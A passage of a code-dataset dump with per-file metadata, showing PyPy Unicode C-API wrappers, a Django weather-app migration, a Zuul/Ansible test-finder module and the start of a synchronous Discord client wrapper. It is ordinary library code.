default_encoding[0] = '\x00' return 0 @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_AsEncodedObject(space, w_unicode, llencoding, llerrors): """Encode a Unicode object and return the result as Python object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) encoding = errors = None if llencoding: encoding = rffi.charp2str(llencoding) if llerrors: errors = rffi.charp2str(llerrors) return unicodetype.encode_object(space, w_unicode, encoding, errors) @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_AsEncodedString(space, w_unicode, llencoding, llerrors): """Encode a Unicode object and return the result as Python string object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" w_str = PyUnicode_AsEncodedObject(space, w_unicode, llencoding, llerrors) if not PyString_Check(space, w_str): raise OperationError(space.w_TypeError, space.wrap( "encoder did not return a string object")) return w_str @cpython_api([PyObject], PyObject) def PyUnicode_AsUnicodeEscapeString(space, w_unicode): """Encode a Unicode object using Unicode-Escape and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) return unicodetype.encode_object(space, w_unicode, 'unicode-escape', 'strict') @cpython_api([CONST_WSTRING, Py_ssize_t], PyObject) def PyUnicode_FromUnicode(space, wchar_p, length): """Create a Unicode Object from the Py_UNICODE buffer u of the given size. u may be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL.""" if wchar_p: s = rffi.wcharpsize2unicode(wchar_p, length) return make_ref(space, space.wrap(s)) else: return rffi.cast(PyObject, new_empty_unicode(space, length)) @cpython_api([CONST_WSTRING, Py_ssize_t], PyObject) def PyUnicode_FromWideChar(space, wchar_p, length): """Create a Unicode object from the wchar_t buffer w of the given size. Return NULL on failure.""" # PyPy supposes Py_UNICODE == wchar_t return PyUnicode_FromUnicode(space, wchar_p, length) @cpython_api([PyObject, CONST_STRING], PyObject) def _PyUnicode_AsDefaultEncodedString(space, w_unicode, errors): return PyUnicode_AsEncodedString(space, w_unicode, lltype.nullptr(rffi.CCHARP.TO), errors) @cpython_api([CONST_STRING, Py_ssize_t, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_Decode(space, s, size, encoding, errors): """Create a Unicode object by decoding size bytes of the encoded string s. encoding and errors have the same meaning as the parameters of the same name in the unicode() built-in function. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec.""" w_str = space.wrap(rffi.charpsize2str(s, size)) w_encoding = space.wrap(rffi.charp2str(encoding)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_str, 'decode', w_encoding, w_errors) @cpython_api([PyObject], PyObject) def PyUnicode_FromObject(space, w_obj): """Shortcut for PyUnicode_FromEncodedObject(obj, NULL, "strict") which is used throughout the interpreter whenever coercion to Unicode is needed.""" if space.is_w(space.type(w_obj), space.w_unicode): return w_obj else: return space.call_function(space.w_unicode, w_obj) @cpython_api([PyObject, CONST_STRING, CONST_STRING], PyObject) def PyUnicode_FromEncodedObject(space, w_obj, encoding, errors): """Coerce an encoded object obj to an Unicode object and return a reference with incremented refcount. String and other char buffer compatible objects are decoded according to the given encoding and using the error handling defined by errors. Both can be NULL to have the interface use the default values (see the next section for details). All other objects, including Unicode objects, cause a TypeError to be set.""" w_encoding = space.wrap(rffi.charp2str(encoding)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None # - unicode is disallowed # - raise TypeError for non-string types if space.is_true(space.isinstance(w_obj, space.w_unicode)): w_meth = None else: try: w_meth = space.getattr(w_obj, space.wrap('decode')) except OperationError, e: if not e.match(space, space.w_AttributeError): raise w_meth = None if w_meth is None: raise OperationError(space.w_TypeError, space.wrap("decoding Unicode is not supported")) return space.call_function(w_meth, w_encoding, w_errors) @cpython_api([CONST_STRING], PyObject) def PyUnicode_FromString(space, s): """Create a Unicode object from an UTF-8 encoded null-terminated char buffer""" w_str = space.wrap(rffi.charp2str(s)) return space.call_method(w_str, 'decode', space.wrap("utf-8")) @cpython_api([CONST_STRING, Py_ssize_t], PyObject) def PyUnicode_FromStringAndSize(space, s, size): """Create a Unicode Object from the char buffer u. The bytes will be interpreted as being UTF-8 encoded. u may also be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL.""" if s: return make_ref(space, PyUnicode_DecodeUTF8( space, s, size, lltype.nullptr(rffi.CCHARP.TO))) else: return rffi.cast(PyObject, new_empty_unicode(space, size)) @cpython_api([rffi.INT_real], PyObject) def PyUnicode_FromOrdinal(space, ordinal): """Create a Unicode Object from the given Unicode code point ordinal. The ordinal must be in range(0x10000) on narrow Python builds (UCS2), and range(0x110000) on wide builds (UCS4). A ValueError is raised in case it is not.""" w_ordinal = space.wrap(rffi.cast(lltype.Signed, ordinal)) return space.call_function(space.builtin.get('unichr'), w_ordinal) @cpython_api([PyObjectP, Py_ssize_t], rffi.INT_real, error=-1) def PyUnicode_Resize(space, ref, newsize): # XXX always create a new string so far py_uni = rffi.cast(PyUnicodeObject, ref[0]) if not py_uni.c_buffer: raise OperationError(space.w_SystemError, space.wrap( "PyUnicode_Resize called on already created string")) try: py_newuni = new_empty_unicode(space, newsize) except MemoryError: Py_DecRef(space, ref[0]) ref[0] = lltype.nullptr(PyObject.TO) raise to_cp = newsize oldsize = py_uni.c_size if oldsize < newsize: to_cp = oldsize for i in range(to_cp): py_newuni.c_buffer[i] = py_uni.c_buffer[i] Py_DecRef(space, ref[0]) ref[0] = rffi.cast(PyObject, py_newuni) return 0 def make_conversion_functions(suffix, encoding): @cpython_api([PyObject], PyObject) @func_renamer('PyUnicode_As%sString' % suffix) def PyUnicode_AsXXXString(space, w_unicode): """Encode a Unicode object and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec.""" if not PyUnicode_Check(space, w_unicode): PyErr_BadArgument(space) return unicodetype.encode_object(space, w_unicode, encoding, "strict") @cpython_api([CONST_STRING, Py_ssize_t, CONST_STRING], PyObject) @func_renamer('PyUnicode_Decode%s' % suffix) def PyUnicode_DecodeXXX(space, s, size, errors): """Create a Unicode object by decoding size bytes of the encoded string s. Return NULL if an exception was raised by the codec. """ w_s = space.wrap(rffi.charpsize2str(s, size)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_s, 'decode', space.wrap(encoding), w_errors) globals()['PyUnicode_Decode%s' % suffix] = PyUnicode_DecodeXXX @cpython_api([CONST_WSTRING, Py_ssize_t, CONST_STRING], PyObject) @func_renamer('PyUnicode_Encode%s' % suffix) def PyUnicode_EncodeXXX(space, s, size, errors): """Encode the Py_UNICODE buffer of the given size and return a Python string object. Return NULL if an exception was raised by the codec.""" w_u = space.wrap(rffi.wcharpsize2unicode(s, size)) if errors: w_errors = space.wrap(rffi.charp2str(errors)) else: w_errors = space.w_None return space.call_method(w_u, 'encode', space.wrap(encoding), w_errors) globals()['PyUnicode_Encode%s' % suffix] = PyUnicode_EncodeXXX make_conversion_functions('UTF8', 'utf-8') make_conversion_functions('ASCII', 'ascii') make_conversion_functions('Latin1', 'latin-1') if sys.platform == 'win32': make_conversion_functions('MBCS', 'mbcs') @cpython_api([rffi.CCHARP, Py_ssize_t, rffi.CCHARP, rffi.INTP], PyObject) def PyUnicode_DecodeUTF16(space, s, size, llerrors, pbyteorder): """Decode length bytes from a UTF-16 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first two bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output (where it will result in either a \ufeff or a \ufffe character). After completion, *byteorder is set to the current byte order at the end of input data. If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec.""" string = rffi.charpsize2str(s, size) if pbyteorder is not None: llbyteorder = rffi.cast(lltype.Signed, pbyteorder[0]) if llbyteorder < 0: byteorder = "little" elif llbyteorder > 0: byteorder = "big" else: byteorder = "native" else: byteorder = "native" if llerrors: errors = rffi.charp2str(llerrors) else: errors = None result, length, byteorder = runicode.str_decode_utf_16_helper( string, size, errors, True, # final ? false for multiple passes? None, # errorhandler byteorder) if pbyteorder is not None: pbyteorder[0] = rffi.cast(rffi.INT, byteorder) return space.wrap(result) @cpython_api([rffi.CCHARP, Py_ssize_t, rffi.CCHARP, rffi.INTP], PyObject) def PyUnicode_DecodeUTF32(space, s, size, llerrors, pbyteorder): """Decode length bytes from a UTF-32 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first four bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output. After completion, *byteorder is set to the current byte order at the end of input data. In a narrow build codepoints outside the BMP will be decoded as surrogate pairs. If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec. """ string = rffi.charpsize2str(s, size) if pbyteorder: llbyteorder = rffi.cast(lltype.Signed, pbyteorder[0]) if llbyteorder < 0: byteorder = "little" elif llbyteorder > 0: byteorder = "big" else: byteorder = "native" else: byteorder = "native" if llerrors: errors = rffi.charp2str(llerrors) else: errors = None result, length, byteorder = runicode.str_decode_utf_32_helper( string, size, errors, True, # final ? false for multiple passes? None, # errorhandler byteorder) if pbyteorder is not None: pbyteorder[0] = rffi.cast(rffi.INT, byteorder) return space.wrap(result) @cpython_api([PyObject, PyObject], rffi.INT_real, error=-2) def PyUnicode_Compare(space, w_left, w_right): """Compare two strings and return -1, 0, 1 for less than, equal, and greater than, respectively.""" return space.int_w(space.cmp(w_left, w_right)) @cpython_api([rffi.CWCHARP, rffi.CWCHARP, Py_ssize_t], lltype.Void) def Py_UNICODE_COPY(space, target, source, length): """Roughly equivalent to memcpy() only the base size is Py_UNICODE copies sizeof(Py_UNICODE) * length bytes from source to target""" for i in range(0, length): target[i] = source[i] @cpython_api([PyObject, PyObject], PyObject) def PyUnicode_Format(space, w_format, w_args): """Return a new string object from format and args; this is analogous to format % args. The args argument must be a tuple.""" return space.mod(w_format, w_args) @cpython_api([PyObject, PyObject], PyObject) def PyUnicode_Join(space, w_sep, w_seq): """Join a sequence of strings using the given separator and return the resulting Unicode string.""" return space.call_method(w_sep, 'join', w_seq) @cpython_api([PyObject, PyObject, PyObject, Py_ssize_t], PyObject) def PyUnicode_Replace(space, w_str, w_substr, w_replstr, maxcount): """Replace at most maxcount occurrences of substr in str with replstr and return the resulting Unicode object. maxcount == -1 means replace all occurrences.""" return space.call_method(w_str, "replace", w_substr, w_replstr, space.wrap(maxcount)) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t, rffi.INT_real], rffi.INT_real, error=-1) def PyUnicode_Tailmatch(space, w_str, w_substr, start, end, direction): """Return 1 if substr matches str[start:end] at the given tail end (direction == -1 means to do a prefix match, direction == 1 a suffix match), 0 otherwise. Return -1 if an error occurred.""" str = space.unicode_w(w_str) substr = space.unicode_w(w_substr) if rffi.cast(lltype.Signed, direction) <= 0: return stringtype.stringstartswith(str, substr, start, end) else: return stringtype.stringendswith(str, substr, start, end) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t], Py_ssize_t, error=-1) def PyUnicode_Count(space, w_str, w_substr, start, end): """Return the number of non-overlapping occurrences of substr in str[start:end]. Return -1 if an error occurred.""" w_count = space.call_method(w_str, "count", w_substr, space.wrap(start), space.wrap(end)) return space.int_w(w_count) @cpython_api([PyObject, PyObject, Py_ssize_t, Py_ssize_t, rffi.INT_real], Py_ssize_t, error=-2) def PyUnicode_Find(space, w_str, w_substr, start, end, direction): """Return the first position of substr in str*[*start:end] using the given direction (direction == 1 means to do a forward search, direction == -1 a backward search). The return value is the index of the first match; a value of -1 indicates that no match was found, and -2 indicates that an error occurred and an exception has been set.""" if rffi.cast(lltype.Signed, direction) > 0: w_pos = space.call_method(w_str, "find", w_substr, space.wrap(start), space.wrap(end)) else: w_pos = space.call_method(w_str, "rfind", w_substr, space.wrap(start), space.wrap(end)) return space.int_w(w_pos) @cpython_api([PyObject, PyObject, Py_ssize_t], PyObject) def PyUnicode_Split(space, w_str, w_sep, maxsplit): """Split a string giving a list of Unicode strings. If sep is NULL, splitting will be done at all whitespace substrings. Otherwise, splits occur at the given separator. At most maxsplit splits will be done. If negative, no limit is set. Separators are not included in the resulting list.""" if w_sep is None: w_sep = space.w_None return space.call_method(w_str, "split", w_sep, space.wrap(maxsplit)) @cpython_api([PyObject, rffi.INT_real], PyObject) def PyUnicode_Splitlines(space, w_str, keepend): """Split a Unicode string at line breaks, returning a list of Unicode strings. CRLF is considered to be one line break. If keepend is 0, the Line break characters are not included in the resulting strings.""" return space.call_method(w_str, "splitlines", space.wrap(keepend))
en
0.790604
## See comment in stringobject.py. # Buffer for the default encoding (used by PyUnicde_GetDefaultEncoding) Allocatse a PyUnicodeObject and its buffer, but without a corresponding interpreter object. The buffer may be mutated, until unicode_realize() is called. Creates the unicode in the interpreter. The PyUnicodeObject buffer must not be modified after this call. Return 1 or 0 depending on whether ch is a whitespace character. Return 1 or 0 depending on whether ch is an alphabetic character. Return 1 or 0 depending on whether ch is an alphanumeric character. Return 1 or 0 depending on whether ch is a linebreak character. Return 1 or 0 depending on whether ch is a decimal character. Return 1 or 0 depending on whether ch is a digit character. Return 1 or 0 depending on whether ch is a numeric character. Return 1 or 0 depending on whether ch is a lowercase character. Return 1 or 0 depending on whether ch is an uppercase character. Return 1 or 0 depending on whether ch is a titlecase character. Return the character ch converted to lower case. Return the character ch converted to upper case. Return the character ch converted to title case. Return the character ch converted to a decimal positive integer. Return -1 if this is not possible. This macro does not raise exceptions. Return the character ch converted to a single digit integer. Return -1 if this is not possible. This macro does not raise exceptions. Return the character ch converted to a double. Return -1.0 if this is not possible. This macro does not raise exceptions. Get the maximum ordinal for a Unicode character. Return a pointer to the internal buffer of the object. o has to be a PyUnicodeObject (not checked). Return the size of the object's internal buffer in bytes. o has to be a PyUnicodeObject (not checked). Return the size of the object. o has to be a PyUnicodeObject (not checked). Return a pointer to the internal Py_UNICODE buffer of the object. ref has to be a PyUnicodeObject (not checked). # Copy unicode buffer Return a read-only pointer to the Unicode object's internal Py_UNICODE buffer, NULL if unicode is not a Unicode object. # Don't use PyUnicode_Check, it will realize the object :-( Copy the Unicode object contents into the wchar_t buffer w. At most size wchar_t characters are copied (excluding a possibly trailing 0-termination character). Return the number of wchar_t characters copied or -1 in case of an error. Note that the resulting wchar_t string may or may not be 0-terminated. It is the responsibility of the caller to make sure that the wchar_t string is 0-terminated in case this is required by the application. # If possible, try to copy the 0-termination as well Returns the currently active default encoding. Sets the currently active default encoding. Returns 0 on success, -1 in case of an error. Encode a Unicode object and return the result as Python object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec. Encode a Unicode object and return the result as Python string object. encoding and errors have the same meaning as the parameters of the same name in the Unicode encode() method. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec. Encode a Unicode object using Unicode-Escape and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec. Create a Unicode Object from the Py_UNICODE buffer u of the given size. u may be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL. Create a Unicode object from the wchar_t buffer w of the given size. Return NULL on failure. # PyPy supposes Py_UNICODE == wchar_t Create a Unicode object by decoding size bytes of the encoded string s. encoding and errors have the same meaning as the parameters of the same name in the unicode() built-in function. The codec to be used is looked up using the Python codec registry. Return NULL if an exception was raised by the codec. Shortcut for PyUnicode_FromEncodedObject(obj, NULL, "strict") which is used throughout the interpreter whenever coercion to Unicode is needed. Coerce an encoded object obj to an Unicode object and return a reference with incremented refcount. String and other char buffer compatible objects are decoded according to the given encoding and using the error handling defined by errors. Both can be NULL to have the interface use the default values (see the next section for details). All other objects, including Unicode objects, cause a TypeError to be set. # - unicode is disallowed # - raise TypeError for non-string types Create a Unicode object from an UTF-8 encoded null-terminated char buffer Create a Unicode Object from the char buffer u. The bytes will be interpreted as being UTF-8 encoded. u may also be NULL which causes the contents to be undefined. It is the user's responsibility to fill in the needed data. The buffer is copied into the new object. If the buffer is not NULL, the return value might be a shared object. Therefore, modification of the resulting Unicode object is only allowed when u is NULL. Create a Unicode Object from the given Unicode code point ordinal. The ordinal must be in range(0x10000) on narrow Python builds (UCS2), and range(0x110000) on wide builds (UCS4). A ValueError is raised in case it is not. # XXX always create a new string so far Encode a Unicode object and return the result as Python string object. Error handling is "strict". Return NULL if an exception was raised by the codec. Create a Unicode object by decoding size bytes of the encoded string s. Return NULL if an exception was raised by the codec. Encode the Py_UNICODE buffer of the given size and return a Python string object. Return NULL if an exception was raised by the codec. Decode length bytes from a UTF-16 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first two bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output (where it will result in either a \ufeff or a \ufffe character). After completion, *byteorder is set to the current byte order at the end of input data. If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec. # final ? false for multiple passes? # errorhandler Decode length bytes from a UTF-32 encoded buffer string and return the corresponding Unicode object. errors (if non-NULL) defines the error handling. It defaults to "strict". If byteorder is non-NULL, the decoder starts decoding using the given byte order: *byteorder == -1: little endian *byteorder == 0: native order *byteorder == 1: big endian If *byteorder is zero, and the first four bytes of the input data are a byte order mark (BOM), the decoder switches to this byte order and the BOM is not copied into the resulting Unicode string. If *byteorder is -1 or 1, any byte order mark is copied to the output. After completion, *byteorder is set to the current byte order at the end of input data. In a narrow build codepoints outside the BMP will be decoded as surrogate pairs. If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec. # final ? false for multiple passes? # errorhandler Compare two strings and return -1, 0, 1 for less than, equal, and greater than, respectively. Roughly equivalent to memcpy() only the base size is Py_UNICODE copies sizeof(Py_UNICODE) * length bytes from source to target Return a new string object from format and args; this is analogous to format % args. The args argument must be a tuple. Join a sequence of strings using the given separator and return the resulting Unicode string. Replace at most maxcount occurrences of substr in str with replstr and return the resulting Unicode object. maxcount == -1 means replace all occurrences. Return 1 if substr matches str[start:end] at the given tail end (direction == -1 means to do a prefix match, direction == 1 a suffix match), 0 otherwise. Return -1 if an error occurred. Return the number of non-overlapping occurrences of substr in str[start:end]. Return -1 if an error occurred. Return the first position of substr in str*[*start:end] using the given direction (direction == 1 means to do a forward search, direction == -1 a backward search). The return value is the index of the first match; a value of -1 indicates that no match was found, and -2 indicates that an error occurred and an exception has been set. Split a string giving a list of Unicode strings. If sep is NULL, splitting will be done at all whitespace substrings. Otherwise, splits occur at the given separator. At most maxsplit splits will be done. If negative, no limit is set. Separators are not included in the resulting list. Split a Unicode string at line breaks, returning a list of Unicode strings. CRLF is considered to be one line break. If keepend is 0, the Line break characters are not included in the resulting strings.
1.781231
2
weather/migrations/0003_auto_20190502_0425.py
JemisaR/Current-Weather
0
6627887
# Generated by Django 2.2.1 on 2019-05-02 01:25 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('weather', '0002_city_zip_code'), ] operations = [ migrations.AlterField( model_name='city', name='latitude', field=models.DecimalField(blank=True, decimal_places=4, max_digits=8), ), migrations.AlterUniqueTogether( name='city', unique_together={('name', 'country_code')}, ), ]
# Generated by Django 2.2.1 on 2019-05-02 01:25 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('weather', '0002_city_zip_code'), ] operations = [ migrations.AlterField( model_name='city', name='latitude', field=models.DecimalField(blank=True, decimal_places=4, max_digits=8), ), migrations.AlterUniqueTogether( name='city', unique_together={('name', 'country_code')}, ), ]
en
0.760129
# Generated by Django 2.2.1 on 2019-05-02 01:25
1.696507
2
cibyl/sources/zuul/apis/utils/tests/ansible/finder.py
rhos-infra/cibyl
3
6627888
""" # Copyright 2022 Red Hat # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ import json import logging from typing import Iterable from overrides import overrides from cibyl.sources.zuul.apis.utils.builds import ArtifactKind from cibyl.sources.zuul.apis.utils.tests.ansible.parser import \ AnsibleTestParser from cibyl.sources.zuul.apis.utils.tests.finder import TestFinder from cibyl.utils.json import Draft7ValidatorFactory, JSONValidatorFactory from cibyl.utils.net import download_into_memory LOG = logging.getLogger(__name__) class AnsibleTestFinder(TestFinder): class TestArgs: DEFAULT_FILES_OF_INTEREST = ['job-output.json'] parser: AnsibleTestParser = AnsibleTestParser() files_of_interest: Iterable[str] = DEFAULT_FILES_OF_INTEREST class ManifestArgs: DEFAULT_MANIFEST_SCHEMA = 'data/json/schemas/zuul/manifest.json' schema: str = DEFAULT_MANIFEST_SCHEMA validator_factory: JSONValidatorFactory = Draft7ValidatorFactory() def __init__(self, manifest_args=ManifestArgs(), test_args=TestArgs()): """ :param manifest_args: :type manifest_args: :class:`AnsibleTestFinder.ManifestArgs` :param test_args: :type test_args: :class:`AnsibleTestFinder.TestArgs` """ self._parser = test_args.parser self._files_of_interest = test_args.files_of_interest self._manifest_schema = manifest_args.schema self._manifest_validator_factory = manifest_args.validator_factory @staticmethod def _download_json(session, url): return json.loads(download_into_memory(url, session=session)) @staticmethod def _get_build_session(build): return build.session.session @staticmethod def _get_build_manifests(build): return [ artifact.url for artifact in build.artifacts if artifact.kind == ArtifactKind.ZUUL_MANIFEST ] @staticmethod def _get_log_file_url(build, file): return f"{build.log_url}{file}" @overrides def find(self, build): result = [] for manifest in self._get_build_manifests(build): result += self._parse_manifest(build, manifest) return result def _parse_manifest(self, build, manifest): result = [] session = self._get_build_session(build) validator = self._new_manifest_validator() contents = self._download_json(session, manifest) if not validator.is_valid(contents): msg = "Unknown format for manifest in: '%s'. Ignoring..." LOG.warning(msg, manifest) return result for file in contents['tree']: name = file['name'] if name in self._files_of_interest: LOG.info(f"Parsing tests from file: '{name}'...") result += self._parse_tests( build, self._get_log_file_url(build, name) ) return result def _new_manifest_validator(self): return self._manifest_validator_factory.from_file( self._manifest_schema ) def _parse_tests(self, build, test): result = [] try: result += self._parser.parse( self._download_json( self._get_build_session(build), test ) ) except ValueError as ex: LOG.warning( "Failed to fetch tests from: '%s'. Reason: '%s'.", test, str(ex) ) return result
""" # Copyright 2022 Red Hat # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ import json import logging from typing import Iterable from overrides import overrides from cibyl.sources.zuul.apis.utils.builds import ArtifactKind from cibyl.sources.zuul.apis.utils.tests.ansible.parser import \ AnsibleTestParser from cibyl.sources.zuul.apis.utils.tests.finder import TestFinder from cibyl.utils.json import Draft7ValidatorFactory, JSONValidatorFactory from cibyl.utils.net import download_into_memory LOG = logging.getLogger(__name__) class AnsibleTestFinder(TestFinder): class TestArgs: DEFAULT_FILES_OF_INTEREST = ['job-output.json'] parser: AnsibleTestParser = AnsibleTestParser() files_of_interest: Iterable[str] = DEFAULT_FILES_OF_INTEREST class ManifestArgs: DEFAULT_MANIFEST_SCHEMA = 'data/json/schemas/zuul/manifest.json' schema: str = DEFAULT_MANIFEST_SCHEMA validator_factory: JSONValidatorFactory = Draft7ValidatorFactory() def __init__(self, manifest_args=ManifestArgs(), test_args=TestArgs()): """ :param manifest_args: :type manifest_args: :class:`AnsibleTestFinder.ManifestArgs` :param test_args: :type test_args: :class:`AnsibleTestFinder.TestArgs` """ self._parser = test_args.parser self._files_of_interest = test_args.files_of_interest self._manifest_schema = manifest_args.schema self._manifest_validator_factory = manifest_args.validator_factory @staticmethod def _download_json(session, url): return json.loads(download_into_memory(url, session=session)) @staticmethod def _get_build_session(build): return build.session.session @staticmethod def _get_build_manifests(build): return [ artifact.url for artifact in build.artifacts if artifact.kind == ArtifactKind.ZUUL_MANIFEST ] @staticmethod def _get_log_file_url(build, file): return f"{build.log_url}{file}" @overrides def find(self, build): result = [] for manifest in self._get_build_manifests(build): result += self._parse_manifest(build, manifest) return result def _parse_manifest(self, build, manifest): result = [] session = self._get_build_session(build) validator = self._new_manifest_validator() contents = self._download_json(session, manifest) if not validator.is_valid(contents): msg = "Unknown format for manifest in: '%s'. Ignoring..." LOG.warning(msg, manifest) return result for file in contents['tree']: name = file['name'] if name in self._files_of_interest: LOG.info(f"Parsing tests from file: '{name}'...") result += self._parse_tests( build, self._get_log_file_url(build, name) ) return result def _new_manifest_validator(self): return self._manifest_validator_factory.from_file( self._manifest_schema ) def _parse_tests(self, build, test): result = [] try: result += self._parser.parse( self._download_json( self._get_build_session(build), test ) ) except ValueError as ex: LOG.warning( "Failed to fetch tests from: '%s'. Reason: '%s'.", test, str(ex) ) return result
en
0.721974
# Copyright 2022 Red Hat # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. :param manifest_args: :type manifest_args: :class:`AnsibleTestFinder.ManifestArgs` :param test_args: :type test_args: :class:`AnsibleTestFinder.TestArgs`
2.115412
2
discordobjects/client/client_sync.py
igo95862/DiscordBot_lib
0
6627889
import typing from .client_async import DiscordClientAsync import asyncio import threading class DiscordClientSync: def __init__(self, token: str, use_socket: bool = True, proxies: dict = None, default_timeout: int = 10): """ wrapper template return asyncio.run_coroutine_threadsafe( self.async_client. , self.client_event_loop ).result(timeout=self.timeout) :param token: :param use_socket: :param proxies: :param default_timeout: """ self.client_event_loop: asyncio.AbstractEventLoop = asyncio.new_event_loop() self.client_thread = threading.Thread(target=self.client_event_loop.run_forever) self.client_thread.start() self.async_client = DiscordClientAsync(token, use_socket, proxies, self.client_event_loop) self.local_event_loop = asyncio.get_event_loop() self.timeout = default_timeout def user_get(self, user_id: str) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.user_get(user_id), self.client_event_loop ).result(timeout=self.timeout) def me_get(self) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_get(), self.client_event_loop ).result(timeout=self.timeout) def me_modify(self, username: str) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_modify(username), self.client_event_loop ).result(timeout=self.timeout) def me_guild_list(self, before: str = None, after: str = None, limit: int = None) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_guild_list(before, after, limit), self.client_event_loop ).result(timeout=self.timeout) def me_guild_leave(self, guild_id: str) -> bool: return asyncio.run_coroutine_threadsafe( self.async_client.me_guild_leave(guild_id), self.client_event_loop ).result(timeout=self.timeout) def me_connections_get(self) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_connections_get(), self.client_event_loop ).result(timeout=self.timeout) def me_dm_list(self) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_dm_list(), self.client_event_loop ).result(timeout=self.timeout) ''' async def dm_create(self, recipient_id: str) -> dict: return await super().dm_create(recipient_id) async def dm_create_group(self, access_tokens: list, nicks: dict) -> dict: return await super().dm_create_group(access_tokens, nicks) async def dm_channel_user_add(self, channel_id: str, user_id: str, access_token: str, user_nick: str) -> dict: return await super().dm_channel_user_add(channel_id, user_id, access_token, user_nick) async def dm_channel_user_remove(self, channel_id: str, user_id: str) -> dict: return await super().dm_channel_user_remove(channel_id, user_id) async def guild_create(self, guild_name: str, region: str = None, icon: str = None, verification_level: int = None, default_message_notifications: int = None, roles=None, channels=None) -> dict: return await super().guild_create(guild_name, region, icon, verification_level, default_message_notifications, roles, channels) async def guild_get(self, guild_id: str) -> dict: return await super().guild_get(guild_id) async def guild_modify_name(self, guild_id: str, new_name: str) -> dict: return await super().guild_modify_name(guild_id, new_name) async def guild_modify_region(self, guild_id: str, new_region: str) -> dict: return await super().guild_modify_region(guild_id, new_region) async def guild_modify_verification_level(self, guild_id: str, new_level: int) -> dict: return await super().guild_modify_verification_level(guild_id, new_level) async def guild_modify_default_notification_level(self, guild_id: str, new_level: int) -> bool: return await super().guild_modify_default_notification_level(guild_id, new_level) async def 